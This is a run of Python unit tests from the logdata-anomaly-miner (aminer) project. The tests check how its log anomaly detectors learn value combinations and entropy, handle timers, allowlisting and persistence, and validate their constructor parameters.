[self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() EnhancedNewMatchPathValueComboDetectorTest.py000066400000000000000000000660711500476301700343700ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysisimport unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector import time from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummySequenceModelElement from datetime import datetime from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EnhancedNewMatchPathValueComboDetectorTest(TestBase): """Unittests for the EnhancedNewMatchPathValueComboDetector.""" match_context = DummyMatchContext(b" pid=25537 uid=2") fdme1 = DummyFixedDataModelElement("s1", b" pid=") fdme2 = DummyFixedDataModelElement("d1", b"25537") seq1 = DummySequenceModelElement("seq", [fdme1, fdme2]) match_element1 = seq1.get_match_element("", match_context) match_context = DummyMatchContext(b"ddd 25538ddd ") fdme3 = DummyFixedDataModelElement("s1", b"ddd ") fdme4 = DummyFixedDataModelElement("d1", b"25538") seq2 = DummySequenceModelElement("seq", [fdme3, fdme4]) match_element2 = seq2.get_match_element("", match_context) match_element3 = fdme3.get_match_element("/seq", match_context) def test1receive_atom(self): """ Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s New value combination(s) detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" # learn_mode = True enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, enmpvcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, enmpvcd) log_atom3 = LogAtom(self.match_element3.match_string, ParserMatch(self.match_element3), t, enmpvcd) self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), enmpvcd.__class__.__name__, 1, f"{{(b' pid=', b'25537'): [{t}, {t}, 1]}}")) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # learn_mode = False enmpvcd.learn_mode = False self.assertTrue(enmpvcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), enmpvcd.__class__.__name__, 1, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t}, 1]}}")) self.reset_output_stream() # repeating should produce the same result, but increase the count log_atom2.atom_time += 100 self.assertTrue(enmpvcd.receive_atom(log_atom2)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+100).strftime(datetime_format_string), enmpvcd.__class__.__name__, 1, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t+100}, 2]}}")) self.reset_output_stream() # allow_missing_values_flag=True enmpvcd.allow_missing_values_flag = True self.assertTrue(enmpvcd.receive_atom(log_atom3)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), enmpvcd.__class__.__name__, 1, f"{{(b' pid=', b'25537'): [{t}, {t}, 2], (b'ddd ', b'25538'): [{t}, {t+100}, 2], (b'ddd ', None): [{t}, {t}, 1]}}")) # stop_learning_time enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(enmpvcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertTrue(enmpvcd.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertFalse(enmpvcd.learn_mode) # stop_learning_no_anomaly_time enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(enmpvcd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertTrue(enmpvcd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(enmpvcd.receive_atom(log_atom2)) self.assertTrue(enmpvcd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertTrue(enmpvcd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertFalse(enmpvcd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = time.time() enmpvcd.next_persist_time = t + 400 self.assertEqual(enmpvcd.do_timer(t + 200), 200) self.assertEqual(enmpvcd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(enmpvcd.do_timer(t + 999), 1) self.assertEqual(enmpvcd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) analysis = "Analysis.%s" value = b"value" value2 = b"value2" log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, enmpvcd) enmpvcd.receive_atom(log_atom1) self.assertRaises(Exception, enmpvcd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None) # The EnhancedNewMatchPathValueComboDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, enmpvcd.allowlist_event, analysis % enmpvcd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(enmpvcd.allowlist_event(analysis % enmpvcd.__class__.__name__, (t, (value, value2)), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (t, (value, value2)))) self.assertEqual(enmpvcd.known_values_dict, {(b' pid=', b'25537'): [t, t, 1], (value, value2): [t, t, 1]}) self.assertRaises(TypeError, enmpvcd.allowlist_event, analysis % enmpvcd.__class__.__name__, (value, None), None) # allow_missing_values_flag = True enmpvcd.allow_missing_values_flag = True self.assertEqual(enmpvcd.allowlist_event(analysis % enmpvcd.__class__.__name__, (t, (value, None)), None), "Allowlisted path(s) %s with %s." % ("/seq/s1, /seq/d1", (t, (value, None)))) self.assertEqual(enmpvcd.known_values_dict, {(b" pid=", b"25537"): [t, t, 1], (value, value2): [t, t, 1], (value, None): [t, t, 1]}) def test4persistence(self): """Test the do_persist and load_persistence_data methods.""" enmpvcd = EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["/seq/s1", "/seq/d1"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False) t = round(time.time(), 3) log_atom1 = LogAtom(self.match_element1.match_string, ParserMatch(self.match_element1), t, enmpvcd) log_atom2 = LogAtom(self.match_element2.match_string, ParserMatch(self.match_element2), t, enmpvcd) self.assertTrue(enmpvcd.receive_atom(log_atom1)) self.assertTrue(enmpvcd.receive_atom(log_atom2)) self.assertEqual(enmpvcd.known_values_dict, {(b' pid=', b'25537'): [t, t, 1], (b"ddd ", b"25538"): [t, t, 1]}) enmpvcd.do_persist() with open(enmpvcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), f'[[["bytes: pid=", "bytes:25537"], [{t}, {t}, 1]], [["bytes:ddd ", "bytes:25538"], [{t}, {t}, 1]]]') enmpvcd.known_values_dict = dict() enmpvcd.load_persistence_data() self.assertEqual(enmpvcd.known_values_dict, {(b' pid=', b'25537'): [t, t, 1], (b"ddd ", b"25538"): [t, t, 1]}) other = EnhancedNewMatchPathValueComboDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler]) self.assertEqual(enmpvcd.known_values_dict, other.known_values_dict) def test5validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], allow_missing_values_flag=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=set()) def func(x): """This is a test function""" return x+1 EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], tuple_transformation_function=func) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EnhancedNewMatchPathValueComboDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) EnhancedNewMatchPathValueComboDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EntropyDetectorTest.py000066400000000000000000002275061500476301700301630ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EntropyDetector import EntropyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EntropyDetectorTest(TestBase): """Unittests for the EntropyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ t = time.time() expected_string = '%s Value entropy anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent string values. Anomalies are detected when character pair distributions deviate. # The following events are generated: # value: aminer # value: logdata-anomaly-miner # value: ait-aecid # value: austrian # value: institute # value: lfmvasacz log_atom1 = LogAtom(b"aminer", ParserMatch(MatchElement("/value", b"aminer", b"aminer", None)), t+1, None) log_atom2 = LogAtom(b"logdata-anomaly-miner", ParserMatch(MatchElement("/value", b"logdata-anomaly-miner", b"logdata-anomaly-miner", None)), t+2, None) log_atom3 = LogAtom(b"ait-aecid", ParserMatch(MatchElement("/value", b"ait-aecid", b"ait-aecid", None)), t+3, None) log_atom4 = LogAtom(b"austrian", ParserMatch(MatchElement("/value", b"austrian", b"austrian", None)), t+4, None) log_atom5 = LogAtom(b"institute", ParserMatch(MatchElement("/value", b"institute", b"institute", None)), t+5, None) log_atom6 = LogAtom(b"lfmvasacz", ParserMatch(MatchElement("/value", b"lfmvasacz", b"lfmvasacz", None)), t+6, None) ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.05, learn_mode=True, output_logline=False) total_freq = {} freq = {} # Forward log atoms to detector # First value should generate an anomaly, because no frequencies are known yet # Input: aminer # Expected output: Anomaly ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Second value should not generate an anomaly, because it contains substring "miner" which shares charpairs with "aminer" # Input: logdata-anomaly-miner # Expected output: None ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Third value should not generate an anomaly, since it is a normal string # Input: ait-aecid # Expected output: None ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Fourth value should not generate an anomaly, since it is a normal string # Input: austrian # Expected output: None ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Fifth value should not generate an anomaly, since it is a normal string # Input: institute # Expected output: None ed.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom5.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # Sixth value should generate an anomaly, since it is a randomly generated string # Input: lfmvasacz # Expected output: Anomaly ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), ed.__class__.__name__, 1, "lfmvasacz")) self.reset_output_stream() self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # frequencies should change if skip_repetitions = False ed.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom6.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) # prob_thresh 10% ed = EntropyDetector(self.aminer_config, [self.stream_printer_event_handler], ["/value"], prob_thresh=0.1, learn_mode=True, output_logline=False) total_freq = {} freq = {} ed.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 1).strftime(dtf), ed.__class__.__name__, 1, "aminer")) self.reset_output_stream() self.add_data(log_atom1.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom2.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.add_data(log_atom3.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) ed.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), ed.__class__.__name__, 1, "austrian")) self.reset_output_stream() self.add_data(log_atom4.raw_data.decode(), freq, total_freq) self.assertEqual(ed.total_freq, total_freq) self.assertEqual(ed.freq, freq) 